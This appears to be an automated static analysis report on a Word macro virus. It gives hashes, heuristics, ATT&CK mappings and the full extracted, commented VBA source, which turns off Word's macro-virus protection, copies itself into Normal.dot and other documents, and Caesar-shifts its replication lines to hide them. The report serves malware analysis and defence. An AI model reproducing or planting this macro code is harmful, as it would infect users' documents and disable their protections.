Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 68ca81425cc44116…

MALICIOUS

Office (OLE)

43.0 KB Created: 2001-08-03 12:06:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d923213897ff0a5ef655bfcad3cc4af8 SHA-1: ee6c51190ccca7832298318cc4fcbd1eeecbc21d SHA-256: 68ca81425cc4411653e22765c5f3b9e6101f76c5df898637fe4f2b9620c1567b
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro in the ThisDocument module that executes when the document is opened (the 'document_open' subroutine, matched by the 'OLE_VBA_DOCOPEN' heuristic) and again when it is closed ('document_close'). The extracted source is a self-replicating Word macro virus, not a downloader: 'document_close' turns off Word's macro virus protection (Options.VirusProtection = False), suppresses the prompt to save the Normal template (Options.SaveNormalPrompt = False), and then copies the full text of its own code module into Normal.dot (NormalTemplate) or into the active document through the VBProject object model, so the macro persists in the template and spreads to other documents. The 'enkrip' and 'dekrip' routines are a self-obfuscation layer that Caesar-shifts (+12 / -12) a fixed range of the module's own lines (46-59, the replication block) and toggles a state flag on module line 2 between "'Read" and "'Unread". No network, file-system or process-creation calls are present in the extracted code, so "download additional content" is not supported by this sample; the legacy WordBasic 'AutoOpen' marker is corroborating evidence of auto-execution surface only. The string 'Rio&Umi 4ever together' is the infection marker searched for in each code module and is also written to Application.Caption and Application.UserName; the email address 'rio96@student.te.ugm.ac.id' is written to Application.UserAddress. Both may identify the original author but are not delivery-infrastructure indicators. ATT&CK mapping: T1059.005 is directly supported by the code; T1137.001 (Office Application Startup: Office Template Macros) describes the Normal.dot persistence and T1562.001 (Impair Defenses) the VirusProtection change; T1566.001 (Spearphishing Attachment) assumes a delivery vector that this static analysis does not establish and should be treated as an assumption.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 44,032 bytes but its declared streams total only 22,687 bytes — 21,345 bytes (48%) live in unallocated sector slack. Unaccounted-for slack is a known hiding place for pre-macro-era Office exploit payloads (e.g. encoded shellcode reached through a parser memory-corruption bug), but large slack regions also occur benignly in old Word binary documents (e.g. space left over from repeated saves). Nothing in this report shows shellcode, an exploit trigger or a parser-CVE indicator in the slack; the MALICIOUS verdict is carried by the VBA macro extracted below. Carve and inspect the slack region (entropy, strings, known shellcode patterns) before making any exploit attribution from this heuristic alone.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. Note that this heuristic's generic description ("no modern VBA project was recovered") does not match this sample: OLE_VBA_MACROS also fired and a VBA module (macros.bas, below) was extracted from the document's VBA project, and its entry points are document_open / document_close rather than AutoOpen. Treat the marker as analyst-facing corroboration of old Word macro execution surface, not as a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11421 bytes
SHA-256: ef36ebf225317ddf0f5f4b8851c5da115477bde2813361cfc70e7a43d05d1930
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Const BOK = "Rio&Umi 4ever together" ' Infection marker: document_open/document_close search the first code module of the active document and of Normal.dot for this string (CodeModule.Find) to decide which of them already carries this macro. The next line ('Read / 'Unread) is module line 2 and is read and rewritten at runtime as the encode/decode state flag, so it must stay exactly as extracted.
'Read
' Auto-executes when the document is opened (Word Document_Open event).
' Purpose: make sure the Caesar-shifted part of this module is decoded
' before document_close later replicates the module text.
'   AD  = first code module of the active document
'   NT  = first code module of Normal.dot (NormalTemplate)
'   Thi = first code module of this document
' CodeModule.Find(BOK, ...) returns True when the module already contains
' the marker string, i.e. when that module is already infected.
' There is no error handler here: if VBProject access fails (on later
' Office versions this presumably requires "Trust access to the VBA project
' object model" — confirm) the handler raises a runtime error and stops.
' No network, file-system or process-creation calls are present; the only
' side effects are self-modification of the module and the caption change.
' NOTE(review): the line numbers this macro passes to CodeModule.lines /
' ReplaceLine refer to the module as extracted (macros.bas); the comment
' lines added to this listing shift them.
Private Sub document_open()
  Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
  Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
  Set Thi = ThisDocument.VBProject.VBComponents(1).CodeModule
  ADi = AD.Find(BOK, 1, 1, 100, 100)
  NTi = NT.Find(BOK, 1, 1, 100, 100)
 
  ' Document and template both infected already: nothing to do.
  If (ADi = True And NTi = True) Then
    GoTo finish
  End If
  ' Module line 2 is the state flag written by enkrip/dekrip:
  '   "'Unread" -> lines 46-59 are Caesar-shifted, decode them now
  '   "'Read"   -> already plain text, nothing to do
  If Thi.lines(2, 1) = "'Unread" Then
    Call dekrip
  ElseIf Thi.lines(2, 1) = "'Read" Then
    GoTo finish
  End If
' Only user-visible effect: the Word title bar shows the marker string.
Application.Caption = "Rio&Umi 4ever together"


finish:
End Sub


' Auto-executes when the document is closed (Word Document_Close event).
' This is the replication routine: it disables Word's macro-virus warning,
' re-encodes its own propagation block, then copies the whole module text
' into whichever of Normal.dot / the active document is not yet infected.
' On Error GoTo finish means any failure (e.g. VBProject access denied)
' silently skips to the trailing ActiveDocument.Save.
' NOTE(review): CodeModule line numbers below refer to the module as
' extracted (macros.bas), not to this commented listing.
Private Sub document_close()
On Error GoTo finish
  ' Defense evasion: switch off Word's "Macro virus protection" prompt and
  ' the "save changes to Normal template?" prompt so the infection of
  ' Normal.dot is saved without asking the user.
  Options.VirusProtection = False
  Options.SaveNormalPrompt = False
  ' Overwrite Word's user information with the author's tag and address
  ' (these strings are the only author-attribution indicators in the sample).
  Application.UserName = "Rio&Umi 4ever together"
  Application.UserAddress = "rio96@student.te.ugm.ac.id"
  Application.UserInitials = "Rio"
  ' Same module handles and infection checks as in document_open.
  Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
  Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
  Set Thi = ThisDocument.VBProject.VBComponents(1).CodeModule
  ADi = AD.Find(BOK, 1, 1, 100, 100)
  NTi = NT.Find(BOK, 1, 1, 100, 100)
  
  ' Both already infected: nothing to do.
  If (ADi = True And NTi = True) Then
    GoTo finish
  End If
  ' Only replicate from the plain-text ("'Read") state; enkrip re-encodes
  ' module lines 46-59 (the If/ElseIf block below) and sets line 2 to
  ' "'Unread" so the copied module is shipped in its obfuscated form.
  ' The already-running compiled code continues past this point unchanged.
  If Thi.lines(2, 1) = "'Read" Then
    Call enkrip
  ElseIf Thi.lines(2, 1) = "'Unread" Then
    GoTo finish
  End If
  
  ' Persistence/spread: this document is infected but Normal.dot is not ->
  ' wipe Normal's first module and paste this module's full text into it.
  ' Normal.dot is never saved explicitly (the Save is commented out with Rem);
  ' presumably Word writes it at exit once SaveNormalPrompt is off — confirm.
  If (ADi = True And NTi = False) Then
    SAVIT = NormalTemplate.Saved
    NT.deletelines 1, NT.Countoflines
    codde = Thi.lines(1, Thi.Countoflines)
    NT.addfromstring codde
    Rem If savit Then NormalTemplate.Save
  ' Normal.dot is infected but this document is not -> overwrite the
  ' document's first module with this code and save it (document infection).
  ElseIf (ADi = False And NTi = True) Then
    SAVIT = ActiveDocument.Saved
    AD.deletelines 1, AD.Countoflines
    codde = Thi.lines(1, Thi.Countoflines)
     AD.addfromstring codde
    If SAVIT Then ActiveDocument.Save
  End If
  
ActiveDocument.Save
finish:


' Reached on every path, including the error path: the document is saved
' again, so the (re-encoded) module is always written back to disk.
ActiveDocument.Save

End Sub

' Self-obfuscation ("encrypt"): rewrites module lines 46-59 of ThisDocument's
' first code module in place. By line count in the extracted module these
' are the replication If/ElseIf block of document_close. Each line becomes a
' comment: a leading apostrophe followed by every character shifted up by 12
' code points (Chr(Asc(c) + 12)), so the propagation code is no longer
' syntactically present in the saved module. Finally module line 2 (the
' state flag) is set to "'Unread". dekrip is the exact inverse.
' All variables except test1 are undeclared (no Option Explicit).
' NOTE(review): the hard-coded line numbers refer to the module as extracted
' (macros.bas), not to this commented listing.
Private Sub enkrip()
Dim test1 As String
   
    'JumLine = ThisDocument.VBProject.VBComponents(1).CodeModule.Countoflines
    For i = 46 To 59
        test1 = "'"
        Line = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(i, 1)
        panbar = Len(Line)
        For t = 1 To panbar
            Kar = Mid$(Line, t, 1)
            test1 = test1 + (Chr(Asc(Kar) + 12))
        Next
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i, test1
    test1 = "'"   ' redundant: reset again at the top of the next iteration
    Next
    ' Flag the module as encoded so document_open knows to call dekrip.
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 2, "'Unread"
End Sub

' Inverse of enkrip ("decrypt"): for module lines 46-59 of ThisDocument's
' first code module, drop the leading apostrophe (the inner loop starts at
' character 2) and shift every remaining character down by 12 code points
' (Chr(Asc(c) - 12)), writing the plain-text line back with ReplaceLine.
' Then module line 2 (the state flag) is set to "'Read" so document_close
' will replicate on the next close.
' NOTE(review): the hard-coded line numbers refer to the module as extracted
' (macros.bas), not to this commented listing.
Private Sub dekrip()
Dim test1 As String
    
    'JumLine = ActiveDocument.VBProject.VBComponents(1).CodeModule.Countoflines
    For i = 46 To 59
        test1 = ""
        Line = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(i, 1)
        panbar = Len(Line)
        For t = 2 To panbar
            Kar = Mid$(Line, t, 1)
            test1 = test1 + (Chr(Asc(Kar) - 12))
        Next
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i, test1
    test1 = ""   ' redundant: reset again at the top of the next iteration
    Next
    ' Flag the module as plain text.
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 2, "'Read"
End Sub


' Processing file: /opt/analyzer/scan_staging/1e82da8e586d42a5bc56eb80a1ab3720.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5798 bytes
' Line #0:
' Line #1:
' 	Dim (Const) 
' 	LitStr 0x0016 "Rio&Umi 4ever together"
' 	VarDefn BOK
' Line #2:
' 	QuoteRem 0x0000 0x0004 "Read"
' Line #3:
' 	FuncDefn (Private Sub document_open())
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ThisDocume
... (truncated)